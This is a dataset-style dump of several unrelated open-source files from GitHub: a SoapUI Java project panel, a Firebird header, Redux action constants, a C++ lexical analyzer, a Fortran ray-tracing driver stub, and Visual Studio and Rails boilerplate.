text
stringlengths 2
100k
| meta
dict |
---|---|
/*
* SoapUI, Copyright (C) 2004-2019 SmartBear Software
*
* Licensed under the EUPL, Version 1.1 or - as soon as they will be approved by the European Commission - subsequent
* versions of the EUPL (the "Licence");
* You may not use this work except in compliance with the Licence.
* You may obtain a copy of the Licence at:
*
* http://ec.europa.eu/idabc/eupl
*
* Unless required by applicable law or agreed to in writing, software distributed under the Licence is
* distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the Licence for the specific language governing permissions and limitations
* under the Licence.
*/
package com.eviware.soapui.impl.wsdl.panels.project;
import com.eviware.soapui.SoapUI;
import com.eviware.soapui.impl.rest.RestService;
import com.eviware.soapui.impl.rest.mock.RestMockAction;
import com.eviware.soapui.impl.rest.mock.RestMockResponse;
import com.eviware.soapui.impl.rest.mock.RestMockService;
import com.eviware.soapui.impl.support.actions.ShowOnlineHelpAction;
import com.eviware.soapui.impl.wsdl.WsdlInterface;
import com.eviware.soapui.impl.wsdl.WsdlProject;
import com.eviware.soapui.impl.wsdl.panels.teststeps.support.AbstractGroovyEditorModel;
import com.eviware.soapui.impl.wsdl.panels.teststeps.support.PropertyHolderTable;
import com.eviware.soapui.impl.wsdl.support.HelpUrls;
import com.eviware.soapui.model.ModelItem;
import com.eviware.soapui.model.iface.Interface;
import com.eviware.soapui.model.mock.MockOperation;
import com.eviware.soapui.model.mock.MockResponse;
import com.eviware.soapui.model.mock.MockService;
import com.eviware.soapui.model.project.Project;
import com.eviware.soapui.model.support.ProjectMetrics;
import com.eviware.soapui.model.testsuite.LoadTest;
import com.eviware.soapui.model.testsuite.TestAssertion;
import com.eviware.soapui.model.testsuite.TestCase;
import com.eviware.soapui.model.testsuite.TestStep;
import com.eviware.soapui.model.testsuite.TestSuite;
import com.eviware.soapui.model.util.ModelItemIconFactory;
import com.eviware.soapui.security.panels.ProjectSensitiveInformationPanel;
import com.eviware.soapui.settings.UISettings;
import com.eviware.soapui.support.DocumentListenerAdapter;
import com.eviware.soapui.support.StringUtils;
import com.eviware.soapui.support.UISupport;
import com.eviware.soapui.support.components.GroovyEditorComponent;
import com.eviware.soapui.support.components.GroovyEditorInspector;
import com.eviware.soapui.support.components.JComponentInspector;
import com.eviware.soapui.support.components.JFocusableComponentInspector;
import com.eviware.soapui.support.components.JInspectorPanel;
import com.eviware.soapui.support.components.JInspectorPanelFactory;
import com.eviware.soapui.support.components.JUndoableTextArea;
import com.eviware.soapui.support.components.JXToolBar;
import com.eviware.soapui.support.components.MetricsPanel;
import com.eviware.soapui.support.components.MetricsPanel.MetricType;
import com.eviware.soapui.support.components.MetricsPanel.MetricsSection;
import com.eviware.soapui.ui.support.ModelItemDesktopPanel;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.BorderFactory;
import javax.swing.JComponent;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTabbedPane;
import javax.swing.event.TreeModelEvent;
import javax.swing.event.TreeModelListener;
import javax.swing.text.Document;
import java.awt.BorderLayout;
import java.awt.Component;
import java.awt.Dimension;
import java.awt.event.ActionEvent;
import java.util.HashSet;
import java.util.Set;
public class WsdlProjectDesktopPanel extends ModelItemDesktopPanel<WsdlProject> {
// These final strings are used both as keys for counters in the MetricsPanel and as
// the actual VISIBLE label in the user interface. They all have to be different.
protected static final String MOCKRESPONSES_STATISTICS = "WsdlMockResponses";
protected static final String MOCKOPERATIONS_STATISTICS = "WsdlMockOperations";
protected static final String MOCKSERVICES_STATISTICS = "WsdlMockServices";
protected static final String REST_MOCKRESPONSES_STATISTICS = "RestMockResponses";
protected static final String REST_MOCKACTIONS_STATISTICS = "RestMockActions";
protected static final String REST_MOCKSERVICES_STATISTICS = "RestMockServices";
protected static final String LOADTESTS_STATISTICS = "LoadTests";
protected static final String ASSERTIONS_STATISTICS = "Assertions";
protected static final String TESTSTEPS_STATISTICS = "TestSteps";
protected static final String TESTCASES_STATISTICS = "TestCases";
protected static final String TESTSUITES_STATISTICS = "TestSuites";
private PropertyHolderTable propertiesTable;
private JUndoableTextArea descriptionArea;
private InternalTreeModelListener treeModelListener;
private Set<String> interfaceNameSet = new HashSet<String>();
private WSSTabPanel wssTabPanel;
protected MetricsPanel metrics;
private GroovyEditorComponent loadScriptGroovyEditor;
private GroovyEditorComponent saveScriptGroovyEditor;
private JInspectorPanel inspectorPanel;
private WsdlProjectTestSuitesTabPanel testSuitesPanel;
private ProjectSensitiveInformationPanel sensitiveInfoPanel;
public WsdlProjectDesktopPanel(WsdlProject modelItem) {
super(modelItem);
add(buildTabbedPane(), BorderLayout.CENTER);
setPreferredSize(new Dimension(600, 600));
}
private Component buildTabbedPane() {
JTabbedPane mainTabs = new JTabbedPane();
addTabs(mainTabs);
return UISupport.createTabPanel(mainTabs, true);
}
protected void addTabs(JTabbedPane mainTabs) {
mainTabs.addTab("Overview", null, buildOverviewTab(), "Shows General Project information and metrics");
mainTabs.addTab("TestSuites", null, testSuitesPanel = buildTestSuitesTab(),
"Shows and runs all TestSuites in project");
mainTabs.addTab("WS-Security Configurations", null, buildWSSTab(), "Manages Security-related configurations");
mainTabs.addTab("Security Scan Defaults", null, buildSecConfigTab(), "Manages Security related configurations");
}
private Component buildSecConfigTab() {
sensitiveInfoPanel = new ProjectSensitiveInformationPanel(getModelItem().getConfig());
return sensitiveInfoPanel.getMainPanel();
}
public WsdlProjectTestSuitesTabPanel getTestSuitesPanel() {
return testSuitesPanel;
}
protected WsdlProjectTestSuitesTabPanel buildTestSuitesTab() {
return new WsdlProjectTestSuitesTabPanel(getModelItem());
}
protected Component buildWSSTab() {
wssTabPanel = new WSSTabPanel(getModelItem().getWssContainer());
return wssTabPanel;
}
protected Component buildOverviewTab() {
inspectorPanel = JInspectorPanelFactory.build(buildProjectOverview());
addOverviewInspectors(inspectorPanel);
inspectorPanel.setCurrentInspector("Properties");
if (StringUtils.hasContent(getModelItem().getDescription())
&& getModelItem().getSettings().getBoolean(UISettings.SHOW_DESCRIPTIONS)) {
inspectorPanel.setCurrentInspector("Description");
}
treeModelListener = new InternalTreeModelListener();
SoapUI.getNavigator().getMainTree().getModel().addTreeModelListener(treeModelListener);
updateStatistics();
return inspectorPanel.getComponent();
}
protected void addOverviewInspectors(JInspectorPanel inspectorPanel) {
inspectorPanel.addInspector(new JFocusableComponentInspector<JPanel>(buildDescriptionPanel(), descriptionArea,
"Description", "Project description", true));
inspectorPanel.addInspector(new JComponentInspector<JComponent>(buildPropertiesPanel(), "Properties",
"Project level properties", true));
inspectorPanel.addInspector(new GroovyEditorInspector(buildLoadScriptPanel(), "Load Script",
"Script to run after loading the project"));
inspectorPanel.addInspector(new GroovyEditorInspector(buildSaveScriptPanel(), "Save Script",
"Script to run before saving the project"));
}
private void updateStatistics() {
ProjectMetrics projectMetrics = new ProjectMetrics(getModelItem());
metrics.setMetric("File Path", getModelItem().getPath());
Set<String> newNames = new HashSet<String>();
boolean rebuilt = false;
for (Interface iface : getModelItem().getInterfaceList()) {
if (!metrics.hasMetric(iface.getName())) {
MetricsSection section = metrics.getSection("Interface Summary");
buildInterfaceSummary(section.clear());
rebuilt = true;
break;
}
newNames.add(iface.getName());
interfaceNameSet.remove(iface.getName());
}
if (!rebuilt) {
if (!interfaceNameSet.isEmpty()) {
MetricsSection section = metrics.getSection("Interface Summary");
buildInterfaceSummary(section.clear());
}
interfaceNameSet = newNames;
}
metrics.setMetric(TESTSUITES_STATISTICS, getModelItem().getTestSuiteCount());
metrics.setMetric(TESTCASES_STATISTICS, projectMetrics.getTestCaseCount());
metrics.setMetric(TESTSTEPS_STATISTICS, projectMetrics.getTestStepCount());
metrics.setMetric(ASSERTIONS_STATISTICS, projectMetrics.getAssertionCount());
metrics.setMetric(LOADTESTS_STATISTICS, projectMetrics.getLoadTestCount());
metrics.setMetric(MOCKSERVICES_STATISTICS, getModelItem().getMockServiceCount());
metrics.setMetric(MOCKOPERATIONS_STATISTICS, projectMetrics.getMockOperationCount());
metrics.setMetric(MOCKRESPONSES_STATISTICS, projectMetrics.getMockResponseCount());
metrics.setMetric(REST_MOCKSERVICES_STATISTICS, getModelItem().getRestMockServiceCount());
metrics.setMetric(REST_MOCKACTIONS_STATISTICS, projectMetrics.getRestMockActionCount());
metrics.setMetric(REST_MOCKRESPONSES_STATISTICS, projectMetrics.getRestMockResponseCount());
}
private JComponent buildProjectOverview() {
metrics = new MetricsPanel();
JXToolBar toolbar = buildOverviewToolbar();
metrics.add(toolbar, BorderLayout.NORTH);
MetricsSection section = metrics.addSection("Project Summary");
section.addMetric(ModelItemIconFactory.getIcon(Project.class), "File Path", MetricType.URL);
section.finish();
section = metrics.addSection("Interface Summary");
buildInterfaceSummary(section);
section = metrics.addSection("Test Summary");
section.addMetric(ModelItemIconFactory.getIcon(TestSuite.class), TESTSUITES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(TestCase.class), TESTCASES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(TestStep.class), TESTSTEPS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(TestAssertion.class), ASSERTIONS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(LoadTest.class), LOADTESTS_STATISTICS);
section.finish();
section = metrics.addSection("SOAP Mock Summary");
section.addMetric(ModelItemIconFactory.getIcon(MockService.class), MOCKSERVICES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(MockOperation.class), MOCKOPERATIONS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(MockResponse.class), MOCKRESPONSES_STATISTICS);
section.finish();
section = metrics.addSection("REST Mock Summary");
section.addMetric(ModelItemIconFactory.getIcon(RestMockService.class), REST_MOCKSERVICES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(RestMockAction.class), REST_MOCKACTIONS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(RestMockResponse.class), REST_MOCKRESPONSES_STATISTICS);
section.finish();
return new JScrollPane(metrics);
}
protected JXToolBar buildOverviewToolbar() {
JXToolBar toolbar = UISupport.createSmallToolbar();
toolbar.addGlue();
toolbar
.addFixed(UISupport.createToolbarButton(new ShowOnlineHelpAction(HelpUrls.PROJECT_OVERVIEW_HELP_URL)));
return toolbar;
}
protected void buildInterfaceSummary(MetricsSection section) {
interfaceNameSet.clear();
for (Interface ic : getModelItem().getInterfaceList()) {
if (ic instanceof WsdlInterface) {
WsdlInterface iface = (WsdlInterface) ic;
section.addMetric(iface.getIcon(), iface.getName(), MetricType.URL).set(iface.getDefinition());
} else if (ic instanceof RestService) {
RestService iface = (RestService) ic;
section.addMetric(iface.getIcon(), iface.getName(), MetricType.URL).set(iface.getWadlUrl());
}
interfaceNameSet.add(ic.getName());
}
section.finish();
}
private JPanel buildDescriptionPanel() {
JPanel panel = new JPanel(new BorderLayout());
descriptionArea = new JUndoableTextArea(getModelItem().getDescription());
descriptionArea.getDocument().addDocumentListener(new DocumentListenerAdapter() {
@Override
public void update(Document document) {
getModelItem().setDescription(descriptionArea.getText());
}
});
panel.setBorder(BorderFactory.createEmptyBorder(2, 2, 2, 2));
panel.add(new JScrollPane(descriptionArea), BorderLayout.CENTER);
UISupport.addTitledBorder(panel, "Project Description");
return panel;
}
protected GroovyEditorComponent buildLoadScriptPanel() {
loadScriptGroovyEditor = new GroovyEditorComponent(new LoadScriptGroovyEditorModel(), null);
return loadScriptGroovyEditor;
}
protected GroovyEditorComponent buildSaveScriptPanel() {
saveScriptGroovyEditor = new GroovyEditorComponent(new SaveScriptGroovyEditorModel(), null);
return saveScriptGroovyEditor;
}
private JComponent buildPropertiesPanel() {
JPanel panel = new JPanel(new BorderLayout());
propertiesTable = new PropertyHolderTable(getModelItem());
if (getModelItem() instanceof WsdlProject) {
((WsdlProject) getModelItem()).addProjectListener(propertiesTable.getProjectListener());
}
panel.add(propertiesTable, BorderLayout.CENTER);
return panel;
}
@Override
public boolean dependsOn(ModelItem modelItem) {
return modelItem == getModelItem();
}
public boolean onClose(boolean canCancel) {
propertiesTable.release();
loadScriptGroovyEditor.getEditor().release();
saveScriptGroovyEditor.getEditor().release();
SoapUI.getNavigator().getMainTree().getModel().removeTreeModelListener(treeModelListener);
wssTabPanel.release();
sensitiveInfoPanel.release();
inspectorPanel.release();
testSuitesPanel.release();
return release();
}
private final class InternalTreeModelListener implements TreeModelListener {
public void treeNodesChanged(TreeModelEvent e) {
updateStatistics();
}
public void treeNodesInserted(TreeModelEvent e) {
updateStatistics();
}
public void treeNodesRemoved(TreeModelEvent e) {
updateStatistics();
}
public void treeStructureChanged(TreeModelEvent e) {
updateStatistics();
}
}
private class LoadScriptGroovyEditorModel extends AbstractGroovyEditorModel {
public LoadScriptGroovyEditorModel() {
super(new String[]{"log", "project"}, WsdlProjectDesktopPanel.this.getModelItem(), "Load");
}
@Override
public String getScript() {
return WsdlProjectDesktopPanel.this.getModelItem().getAfterLoadScript();
}
@Override
public void setScript(String text) {
WsdlProjectDesktopPanel.this.getModelItem().setAfterLoadScript(text);
}
@Override
public Action getRunAction() {
return new AfterLoadScriptRunAction();
}
private final class AfterLoadScriptRunAction extends AbstractAction {
public AfterLoadScriptRunAction() {
putValue(Action.SMALL_ICON, UISupport.createImageIcon("/run.png"));
putValue(SHORT_DESCRIPTION, "Runs this script");
}
public void actionPerformed(ActionEvent e) {
try {
WsdlProjectDesktopPanel.this.getModelItem().runAfterLoadScript();
} catch (Exception e1) {
UISupport.showErrorMessage(e1);
}
}
}
}
private class SaveScriptGroovyEditorModel extends AbstractGroovyEditorModel {
public SaveScriptGroovyEditorModel() {
super(new String[]{"log", "project"}, WsdlProjectDesktopPanel.this.getModelItem(), "Save");
}
@Override
public String getScript() {
return WsdlProjectDesktopPanel.this.getModelItem().getBeforeSaveScript();
}
@Override
public void setScript(String text) {
WsdlProjectDesktopPanel.this.getModelItem().setBeforeSaveScript(text);
}
@Override
public Action getRunAction() {
return new BeforeSaveScriptRunAction();
}
private final class BeforeSaveScriptRunAction extends AbstractAction {
public BeforeSaveScriptRunAction() {
putValue(Action.SMALL_ICON, UISupport.createImageIcon("/run.png"));
putValue(SHORT_DESCRIPTION, "Runs this script");
}
public void actionPerformed(ActionEvent e) {
try {
WsdlProjectDesktopPanel.this.getModelItem().runBeforeSaveScript();
} catch (Exception e1) {
UISupport.showErrorMessage(e1);
}
}
}
}
}
| {
"pile_set_name": "Github"
} |
/*
* PROGRAM: JRD Command Oriented Query Language
* MODULE: show_proto.h
* DESCRIPTION: Prototype header file for show.cpp
*
* The contents of this file are subject to the Interbase Public
* License Version 1.0 (the "License"); you may not use this file
* except in compliance with the License. You may obtain a copy
* of the License at http://www.Inprise.com/IPL.html
*
* Software distributed under the License is distributed on an
* "AS IS" basis, WITHOUT WARRANTY OF ANY KIND, either express
* or implied. See the License for the specific language governing
* rights and limitations under the License.
*
* The Original Code was created by Inprise Corporation
* and its predecessors. Portions created by Inprise Corporation are
* Copyright (C) Inprise Corporation.
*
* All Rights Reserved.
* Contributor(s): ______________________________________.
*/
#ifndef QLI_SHOW_PROTO_H
#define QLI_SHOW_PROTO_H
void SHOW_stuff(qli_syntax*);
#endif // QLI_SHOW_PROTO_H
| {
"pile_set_name": "Github"
} |
// Admin
// auth
export const SET_CURRENT_USER = 'SET_CURRENT_USER';
export const FETCH_TOKEN = 'FETCH_TOKEN';
export const REMEMBER_USER = 'REMEMBER_USER';
export const UN_REMEMBER_USER = 'UN_REMEMBER_USER';
export const AUTH_ERROR = 'AUTH_ERROR';
// users
export const LOAD_USERS = 'LOAD_USERS';
export const RECEIVE_USERS = 'REDCIVE_USERS';
// goods
export const LOAD_GOODS = 'LOAD_GOODS';
export const RECEIVE_GOODS = 'RECEIVE_GOODS';
export const CREATE_SUCCESS = 'CREATE_SUCCESS';
export const CREATE_FAILURE = 'CREATE_FAILURE';
// category first
export const LOAD_CATEGORIES_FIRST = 'LOAD_CATEGORIES_FIRST';
export const FINISH_CATEGORIES_FIRST = 'FINISH_CATEGORIES_FIRST';
export const CREATE_CATEGORY_FIRST = 'CREATE_CATEGORY_FIRST';
// category second
export const LOAD_CATEGORIES_SECOND = 'LOAD_CATEGORIES_SECOND';
export const FINISH_CATEGORIES_SECOND = 'FINISH_CATEGORIES_SECOND';
export const CREATE_CATEGORY_SECOND = 'CREATE_CATEGORY_SECOND';
// service
export const SERVICE_START = 'SERVICE_START';
export const SERVICE_END = 'SERVICE_END';
// order
export const LOAD_ORDERS = 'LOAD_ORDERS';
export const RECEIVE_ORDERS = 'RECEIVE_ORDERS';
export const STATISTICS_ORDER = 'STATISTICS_ORDER'; // 订单统计
export const ORDER_SERVICE_START = 'ORDER_SERVICE_START';
export const ORDER_SERVICE_END = 'ORDER_SERVICE_END';
// admin
export const LOAD_ADMIN_INFO = 'LOAD_ADMIN_INFO';
export const LOAD_ADMIN_INFO_SUCCESS = 'LOAD_ADMIN_INFO_SUCCESS';
export const LOAD_ADMIN_INFO_FAILURE = 'LOAD_ADMIN_INFO_FAILURE';
// advs
export const LOAD_ADVS = 'LOAD_ADVS';
export const LOAD_ADVS_SUCCESS = 'LOAD_ADVS_SUCCESS';
export const LOAD_ADVS_FAILURE = 'LOAD_ADVS_FAILURE';
| {
"pile_set_name": "Github"
} |
/*************************************************************************
> File Name: lexical.cpp
> Author: Netcan
> Blog: http://www.netcan666.com
> Mail: [email protected]
> Created Time: 2016-10-05 三 20:34:12 CST
__----~~~~~~~~~~~------___
. . ~~//====...... __--~ ~~
-. \_|// |||\\ ~~~~~~::::... /~
___-==_ _-~o~ \/ ||| \\ _/~~-
__---~~~.==~||\=_ -_--~/_-~|- |\\ \\ _/~
_-~~ .=~ | \\-_ '-~7 /- / || \ /
.~ .~ | \\ -_ / /- / || \ /
/ ____ / | \\ ~-_/ /|- _/ .|| \ /
|~~ ~~|--~~~~--_ \ ~==-/ | \~--===~~ .\
' ~-| /| |-~\~~ __--~~
|-~~-_/ | | ~\_ _-~ /\
/ \ \__ \/~ \__
_--~ _/ | .-~~____--~-/ ~~==.
((->/~ '.|||' -_| ~~-/ , . _||
-_ ~\ ~~---l__i__i__i--~~_/
_-~-__ ~) \--______________--~~
//.-~~~-~_--~- |-------~~~~~~~~
//.-~~~--\
神兽保佑,代码无BUG!
*************************************************************************/
#include "lexical.h"
void Key::add(const string &str, int loc) {
Trie *p = this->root, *q;
for(unsigned int i=0; i<str.length(); ++i) {
int id = str[i] - 'a';
if(p->next[id] == NULL) {
q = new Trie();
p->next[id] = q;
}
p = p->next[id];
}
p->isEnd = true;
p->loc = loc;
}
void Key::add(vector<string> strs) {
int loc = 0;
for(auto str : strs) {
this->add(str, loc++);
}
}
int Key::find(const string &str) {
Trie *p = this->root;
for(unsigned int i=0; i<str.length(); ++i) {
int id = str[i] - 'a';
if(id < 0 || id >= 26)
return -1;
p = p->next[id];
if(p == NULL) return -1;
}
if(p->isEnd) return p->loc;
else return -1;
}
void Key::free(Trie *p) {
if(p == NULL) return;
for(int i=0; i<26; ++i) this->free(p->next[i]);
delete p;
}
template<class T, size_t n> // 数组末尾元素指针
T* tail(T (&a)[n]) {
return a+n;
}
Lexical::Lexical() {
const char * ks[] = { // 关键字表
"auto", "double", "int", "struct", "break", "else", "long",
"switch","case", "enum", "register", "typedef", "char",
"extern", "return", "union","const", "float", "short",
"unsigned", "continue", "for", "signed", "void","default",
"goto", "sizeof", "volatile", "do", "if", "while", "static"
};
keys.add(vector<string>(ks, tail(ks)));
// 分界符
optrs.push_back(make_pair(",", DELIMITER));
optrs.push_back(make_pair(";", DELIMITER));
optrs.push_back(make_pair("(", DELIMITER));
optrs.push_back(make_pair(")", DELIMITER));
optrs.push_back(make_pair("[", DELIMITER));
optrs.push_back(make_pair("]", DELIMITER));
optrs.push_back(make_pair("{", DELIMITER));
optrs.push_back(make_pair("}", DELIMITER));
// 算术运算符
optrs.push_back(make_pair("+", ARITHMETICOPTR));
optrs.push_back(make_pair("-", ARITHMETICOPTR));
optrs.push_back(make_pair("*", ARITHMETICOPTR));
optrs.push_back(make_pair("/", ARITHMETICOPTR));
optrs.push_back(make_pair("%", ARITHMETICOPTR));
optrs.push_back(make_pair("++", ARITHMETICOPTR));
optrs.push_back(make_pair("--", ARITHMETICOPTR));
// 关系运算符
optrs.push_back(make_pair(">", RELATIONOPTR));
optrs.push_back(make_pair(">=", RELATIONOPTR));
optrs.push_back(make_pair("<", RELATIONOPTR));
optrs.push_back(make_pair("<=", RELATIONOPTR));
optrs.push_back(make_pair("==", RELATIONOPTR));
optrs.push_back(make_pair("<>", RELATIONOPTR));
optrs.push_back(make_pair("=", RELATIONOPTR));
row = column = 0;
isFirst = true;
}
string Lexical::cut(int i, int j) {
return string(in.begin() + i, in.begin() + j);
}
bool Lexical::isKey(const string &str) {
if(keys.find(str) != -1) return true;
else return false;
}
int Lexical::getKeyPointer(const string &str) {
return keys.find(str);
}
bool Lexical::isOptr(const string &str) {
for(auto opt:optrs)
if(opt.first == str) return true;
return false;
}
int Lexical::getOptrPointer(const string &str) {
vector<pair<string, Type> >::iterator it;
for(it = optrs.begin(); it != optrs.end() && it->first != str; ++it);
return it - optrs.begin();
}
Type Lexical::getOptrType(const string &str) {
vector<pair<string, Type> >::iterator it;
for(it = optrs.begin(); it != optrs.end() && it->first != str; ++it);
if(it != optrs.end())
return it->second;
else return ERROR;
}
bool Lexical::isId(const string &str) {
if(!isalpha(str.c_str()[0]) && str.c_str()[0] != '_')
return false;
for(auto c: str)
if(!isalnum(c) && c != '_') return false;
return true;
}
int Lexical::getIDPointer(const string &str) {
vector<pair<string, Type> >::iterator it = find(indetifiers.begin(), indetifiers.end(), make_pair(str, ID));
if(it != indetifiers.end()) // 找到了
return it - indetifiers.begin();
else {
indetifiers.push_back(make_pair(str, ID));
return indetifiers.size() - 1;
}
}
bool Lexical::isNum(const string &str) {
for(auto c:str)
if(!isdigit(c)) return false;
return true;
}
int Lexical::getNumPointer(const string &str) {
vector<pair<string, Type> >::iterator it = find(constants.begin(), constants.end(), make_pair(str, NUMBER));
if(it != constants.end()) // 找到了
return it - constants.begin();
else {
constants.push_back(make_pair(str, NUMBER));
return constants.size() - 1;
}
}
bool Lexical::isString(const string &str) { // 是否字符串
return true;
}
int Lexical::getStringPointer(const string &str) {
vector<pair<string, Type> >::iterator it = find(strings.begin(), strings.end(), make_pair(str, STRING));
if(it != strings.end()) // 找到了
return it - strings.begin();
else {
strings.push_back(make_pair(str, STRING));
return strings.size() - 1;
}
}
bool Lexical::isChar(const string &chr) {
if(chr.length() == 1 || (chr[0] == '\\' && chr.length() == 2))
return true;
else
return false;
}
int Lexical::getCharPointer(const string &chr) {
vector<pair<char, Type> >::iterator it = find(chars.begin(), chars.end(), make_pair(chr.c_str()[0], CHAR));
if(it != chars.end()) // 找到了
return it - chars.begin();
else {
chars.push_back(make_pair(chr.c_str()[0], CHAR));
return chars.size() - 1;
}
};
bool Lexical::getIn() {
++row;
return getline(cin, in);
}
void Lexical::analysis() {
unsigned int j = 0;
for(column = 0; column < in.length(); ++column) {
char c = in.c_str()[column];
if(isalpha(c)) {
for(j = column+1; j < in.length() && (isalnum(in[j]) || in[j] == '_'); ++j); // 匹配关键字或者标识符自动机
string s = cut(column, j);
if(!isFirst) printf(", ");
else isFirst = false;
if(isKey(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), KEY, getKeyPointer(s), typeStr[KEY], row, column+1);
else if(isId(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ID, getIDPointer(s), typeStr[ID], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j-1;
}
else if(isdigit(c)) {
for(j = column+1; j < in.length() && (isalnum(in[j]) || in[j] == '_'); ++j); // 匹配数字字符串自动机
string s = cut(column, j);
if(!isFirst) printf(", ");
else isFirst = false;
if(isNum(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), NUMBER, getNumPointer(s), typeStr[NUMBER], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j - 1;
}
else if(c == '/' && in[column+1] == '/') { // 注释
for(column += 2; column < in.length() && isspace(column); ++column);
string s = cut(column, in.length());
if(!isFirst) printf(", ");
else isFirst = false;
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), COMMENT, 0, typeStr[COMMENT], row, column+1);
column = in.length();
}
else if(isOptr(string(1, c))){
for(j = column+1; j < in.length() && isOptr(string(1, in[j])) && getOptrType(string(1, in[j])) != DELIMITER && getOptrType(string(1, in[j])) == getOptrType(string(1,c)); ++j); // 运算符自动机
string s = cut(column, j);
if(!isFirst) printf(", ");
else isFirst = false;
if(isOptr(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), getOptrType(s), getOptrPointer(s), typeStr[getOptrType(s)], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j - 1;
}
else if(c == '"' || c == '\'') { // 字符串
for(j = column+1; j < in.length() && ( (in[j]=='\\' && ++j) || in[j] != c); ++j); // 字符(串)自动机
string s = cut(column+1, j);
// printf("%s(%ld)\n", s.c_str(), s.length());
if(!isFirst) printf(", ");
else isFirst = false;
if(c == '"' && j < in.length())
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), STRING, getStringPointer(s), typeStr[STRING], row, column+1);
else if(c == '\'' && isChar(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), CHAR, getCharPointer(s), typeStr[CHAR], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j;
}
else if(!isspace(c)) {
if(!isFirst) printf(", ");
else isFirst = false;
if(c=='"')
printf("{\"word\": \"\\\"\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", ERROR, ERROR, typeStr[ERROR], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", string(1,c).c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
}
}
}
void Lexical::run() {
while(getIn()) {
analysis();
}
}
int main() {
Lexical lex;
lex.run();
return 0;
}
| {
"pile_set_name": "Github"
} |
<%@ Application Codebehind="Global.asax.cs" Inherits="MVCMusicStore.MvcApplication" Language="C#" %>
| {
"pile_set_name": "Github"
} |
head 1.1;
access;
symbols;
locks; strict;
comment @c @;
1.1
date 97.01.31.18.01.22; author john; state Exp;
branches;
next ;
desc
@triso
@
1.1
log
@Initial revision
@
text
@*********************************************************
* *
* TRISO: Ray Tracing over Tabular Transversely *
* Isotropic Media. *
* *
* Author: Sebastien Geoltrain *
* *
* Copyrights: Center for Wave Phenomena, *
* Mathematics Department, *
* Colorado School of Mines, *
* Golden, CO 80401. *
* *
* All Rights Reserved. *
* *
*********************************************************
integer stdin, stdout, stderr, temp1, temp2, temp3
common /io/ stdin, stdout, stderr, temp1, temp2, temp3
* Definition of logical unit numbers
* ... to be modified to comply with your system
stdin = 5
stdout = 6
stderr = 0
temp1 = 10
temp2 = 20
temp3 = 30
* call to the ray tracing code
call cshotprof()
stop
end
@
| {
"pile_set_name": "Github"
} |
class ApplicationController < ActionController::Base
protect_from_forgery
end
| {
"pile_set_name": "Github"
} |
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VSTProject", "VSTProject.vcxproj", "{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x64.ActiveCfg = Debug|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x64.Build.0 = Debug|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x86.ActiveCfg = Debug|Win32
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x86.Build.0 = Debug|Win32
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x64.ActiveCfg = Release|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x64.Build.0 = Release|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x86.ActiveCfg = Release|Win32
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
| {
"pile_set_name": "Github"
